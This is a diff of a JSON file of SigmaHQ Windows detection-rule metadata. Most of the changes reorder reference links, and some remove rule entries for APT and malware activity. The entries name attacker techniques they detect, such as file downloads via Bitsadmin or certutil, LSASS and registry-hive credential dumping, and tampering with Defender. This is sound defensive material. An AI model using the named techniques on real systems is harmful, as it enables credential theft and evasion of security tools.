- "value": "Potential CVE-2022-26809 Exploitation Attempt"
- },
{
"description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy",
"meta": {
@@ -47952,9 +47148,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml"
],
"tags": [
@@ -47978,8 +47174,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://isc.sans.edu/diary/22264",
"https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://isc.sans.edu/diary/22264",
"https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"
],
@@ -48010,67 +47206,6 @@
"uuid": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede",
"value": "File Download Via Bitsadmin"
},
- {
- "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_oilrig_mar18.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_oilrig_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06",
- "value": "OilRig APT Activity"
- },
{
"description": "Detects code execution via the Windows Update client (wuauclt)",
"meta": {
@@ -48245,40 +47380,6 @@
"uuid": "883835a7-df45-43e4-bf1d-4268768afda4",
"value": "Regedit as Trusted Installer"
},
- {
- "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/04/07",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt10_cloud_hopper.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.g0045",
- "attack.t1059.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "966e4016-627f-44f7-8341-f394905c361f",
- "value": "Potential APT10 Cloud Hopper Activity"
- },
{
"description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n",
"meta": {
@@ -48292,13 +47393,13 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
"https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/",
- "https://twitter.com/CyberRaiju/status/1251492025678983169",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32",
- "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
"https://www.cobaltstrike.com/help-opsec",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32",
+ "https://twitter.com/CyberRaiju/status/1251492025678983169",
+ "https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml"
],
"tags": [
@@ -48331,10 +47432,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/",
+ "https://forensicitguy.github.io/agenttesla-vba-certutil-download/",
"https://twitter.com/egre55/status/1087685529016193025",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil",
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_direct_ip.yml"
],
@@ -48388,31 +47489,6 @@
"uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d",
"value": "Potential RDP Tunneling Via SSH"
},
- {
- "description": "Detects potential Muddywater APT activity",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_muddywater_activity.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.mandiant.com/resources/blog/iranian-threat-group-updates-ttps-in-spear-phishing-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_muddywater_activity.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.g0069"
- ]
- },
- "uuid": "36222790-0d43-4fe8-86e4-674b27809543",
- "value": "Potential MuddyWater APT Activity"
- },
{
"description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.",
"meta": {
@@ -48546,40 +47622,6 @@
"uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205",
"value": "Renamed Vmnat.exe Execution"
},
- {
- "description": "Detects Trickbot malware process tree pattern in which \"rundll32.exe\" is a parent of \"wermgr.exe\"",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2020/11/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_trickbot_wermgr.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1559"
- ]
- },
- "related": [
- {
- "dest-uuid": "acd0ba37-7ba9-4cc5-ac61-796586cd856d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27",
- "value": "Trickbot Malware Activity"
- },
{
"description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples",
"meta": {
@@ -48593,8 +47635,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.localpotato.com/localpotato_html/LocalPotato.html",
"https://github.com/decoder-it/LocalPotato",
+ "https://www.localpotato.com/localpotato_html/LocalPotato.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_localpotato.yml"
],
"tags": [
@@ -48619,8 +47661,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/sensepost/impersonate",
"https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/",
+ "https://github.com/sensepost/impersonate",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml"
],
"tags": [
@@ -48722,8 +47764,8 @@
"logsource.product": "windows",
"refs": [
"https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://www.scythe.io/library/threat-emulation-qakbot",
"https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/",
+ "https://www.scythe.io/library/threat-emulation-qakbot",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml"
],
"tags": [
@@ -48850,8 +47892,8 @@
"logsource.product": "windows",
"refs": [
"https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
- "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
"https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
+ "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml"
],
"tags": [
@@ -48941,9 +47983,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml"
],
"tags": [
@@ -48986,116 +48028,6 @@
"uuid": "d65aee4d-2292-4cea-b832-83accd6cfa43",
"value": "Arbitrary Binary Execution Using GUP Utility"
},
- {
- "description": "Detects potential EmpireMonkey APT activity",
- "meta": {
- "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/04/02",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_empiremonkey.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/actor/anthropoid_spider",
- "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.010"
- ]
- },
- "related": [
- {
- "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d",
- "value": "Potential EmpireMonkey Activity"
- },
- {
- "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/01/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_lolbin_rdrleakdiag.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rdrleakdiag.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036",
- "attack.t1003.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "6355a919-2e97-4285-a673-74645566340d",
- "value": "Process Memory Dumped Via RdrLeakDiag.EXE"
- },
- {
- "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2017/10/22",
- "falsepositive": [
- "Renamed SysInternals tool"
- ],
- "filename": "proc_creation_win_apt_ta17_293a_ps.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.us-cert.gov/ncas/alerts/TA17-293A",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.g0035",
- "attack.t1036.003",
- "car.2013-05-009"
- ]
- },
- "related": [
- {
- "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "18da1007-3f26-470f-875d-f77faf1cab31",
- "value": "Ps.exe Renamed SysInternals Tool"
- },
{
"description": "Detects a code page switch in command line or batch scripts to a rare language",
"meta": {
@@ -49109,8 +48041,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cglyer/status/1183756892952248325",
"https://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers",
+ "https://twitter.com/cglyer/status/1183756892952248325",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chcp_codepage_switch.yml"
],
"tags": [
@@ -49176,9 +48108,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
- "https://twitter.com/_st0pp3r_/status/1583914515996897281",
"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/",
+ "https://twitter.com/_st0pp3r_/status/1583914515996897281",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml"
],
"tags": [
@@ -49344,58 +48276,6 @@
"uuid": "4f7a6757-ff79-46db-9687-66501a02d9ec",
"value": "Active Directory Structure Export Via Ldifde.EXE"
},
- {
- "description": "Detects potential Dridex acitvity via specific process patterns",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2019/01/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_dridex.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3",
- "https://redcanary.com/threat-detection-report/threats/dridex/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055",
- "attack.discovery",
- "attack.t1135",
- "attack.t1033"
- ]
- },
- "related": [
- {
- "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e",
- "value": "Potential Dridex Activity"
- },
{
"description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services",
"meta": {
@@ -49477,8 +48357,8 @@
"logsource.product": "windows",
"refs": [
"https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges",
- "https://github.com/samratashok/ADModule",
"https://twitter.com/cyb3rops/status/1617108657166061568?s=20",
+ "https://github.com/samratashok/ADModule",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml"
],
"tags": [
@@ -49537,9 +48417,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/0gtweet/status/1583356502340870144",
"https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
"https://lolbas-project.github.io/lolbas/Binaries/Setres/",
+ "https://twitter.com/0gtweet/status/1583356502340870144",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"
],
@@ -49581,10 +48461,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43",
"https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat",
"https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat",
+ "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml"
],
"tags": [
@@ -49972,8 +48852,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/mrd0x/status/1475085452784844803?s=12",
"https://twitter.com/an0n_r0/status/1474698356635193346?s=12",
+ "https://twitter.com/mrd0x/status/1475085452784844803?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml"
],
"tags": "No established tags"
@@ -49995,9 +48875,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.poweradmin.com/paexec/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://www.poweradmin.com/paexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml"
],
"tags": [
@@ -50017,39 +48897,6 @@
"uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23",
"value": "PsExec/PAExec Escalation to LOCAL SYSTEM"
},
- {
- "description": "Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/01/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_unc2452_cmds.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9be34ad0-b6a7-4fbd-91cf-fc7ec1047f5f",
- "value": "UNC2452 Process Creation Patterns"
- },
{
"description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection",
"meta": {
@@ -50063,8 +48910,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
"https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
+ "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml"
],
"tags": [
@@ -50132,8 +48979,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.echotrail.io/insights/search/defaultpack.exe",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/",
+ "https://www.echotrail.io/insights/search/defaultpack.exe",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml"
],
"tags": [
@@ -50167,10 +49014,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf",
"https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml"
],
"tags": [
@@ -50305,8 +49152,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control",
- "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
"https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_legacy_option.yml"
],
"tags": [
@@ -50397,7 +49244,7 @@
{
"description": "Detects suspicious and uncommon child processes of WmiPrvSE",
"meta": {
- "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng",
+ "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)",
"creation_date": "2021/08/23",
"falsepositive": [
"Unknown"
@@ -50409,6 +49256,7 @@
"refs": [
"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
"https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/",
+ "https://twitter.com/ForensicITGuy/status/1334734244120309760",
"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml"
],
@@ -50446,40 +49294,6 @@
"uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937",
"value": "Suspicious WmiPrvSE Child Process"
},
- {
- "description": "Detects suspicious command line patterns seen being used by MERCURY APT",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2022/08/26",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_mercury.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_mercury.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.g0069"
- ]
- },
- "related": [
- {
- "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d",
- "value": "MERCURY APT Activity"
- },
{
"description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline",
"meta": {
@@ -50493,10 +49307,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry",
"https://github.com/HyperSine/how-does-MobaXterm-encrypt-password",
"https://isc.sans.edu/diary/More+Data+Exfiltration/25698",
"https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt",
+ "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml"
],
"tags": [
@@ -50586,8 +49400,8 @@
"logsource.product": "windows",
"refs": [
"https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/jonasLyk/status/1555914501802921984",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml"
],
"tags": [
@@ -50677,9 +49491,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
"https://eqllib.readthedocs.io/en/latest/analytics/210b4ea4-12fc-11e9-8d76-4d6bb837cda4.html",
"https://eqllib.readthedocs.io/en/latest/analytics/1e1ef6be-12fc-11e9-8d76-4d6bb837cda4.html",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dump.yml"
],
"tags": [
@@ -50932,11 +49746,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
"https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md",
+ "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
+ "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"
],
"tags": [
@@ -51021,8 +49835,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "Internal Research",
"https://tools.thehacker.recipes/mimikatz/modules",
+ "Internal Research",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml"
],
"tags": "No established tags"
@@ -51030,40 +49844,6 @@
